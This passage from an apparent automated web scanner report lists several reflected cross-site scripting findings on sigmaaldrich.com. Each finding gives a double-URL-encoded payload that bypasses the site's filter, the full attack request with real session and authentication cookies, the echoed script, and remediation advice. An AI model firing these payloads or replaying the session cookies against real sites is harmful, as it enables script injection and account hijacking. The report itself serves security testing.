Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8df8a";alert(1)//53c8f92fc22/medialib/labware/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.384. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65896%2522%253balert%25281%2529%252f%252f53dd4c62d38 was submitted in the REST URL parameter 2. This input was echoed as 65896";alert(1)//53dd4c62d38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib65896%2522%253balert%25281%2529%252f%252f53dd4c62d38/labware/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib65896";alert(1)//53dd4c62d38/labware/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.385. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3c74%2522%253balert%25281%2529%252f%252fd8786125f12 was submitted in the REST URL parameter 3. This input was echoed as a3c74";alert(1)//d8786125f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarea3c74%2522%253balert%25281%2529%252f%252fd8786125f12/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarea3c74";alert(1)//d8786125f12/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.386. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa39%2522%253balert%25281%2529%252f%252fb357c675a75 was submitted in the REST URL parameter 4. This input was echoed as dfa39";alert(1)//b357c675a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsdfa39%2522%253balert%25281%2529%252f%252fb357c675a75/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsdfa39";alert(1)//b357c675a75/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.387. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d82%2522%253balert%25281%2529%252f%252f1050d443b was submitted in the REST URL parameter 5. This input was echoed as 39d82";alert(1)//1050d443b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/ph-supplies39d82%2522%253balert%25281%2529%252f%252f1050d443b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/ph-supplies39d82";alert(1)//1050d443b","E404") ;
   </script>
...[SNIP]...

1.388. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aab7d%2522%253balert%25281%2529%252f%252f1ec0894cb1e was submitted in the REST URL parameter 1. This input was echoed as aab7d";alert(1)//1ec0894cb1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcaab7d%2522%253balert%25281%2529%252f%252f1ec0894cb1e/medialib/labware/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
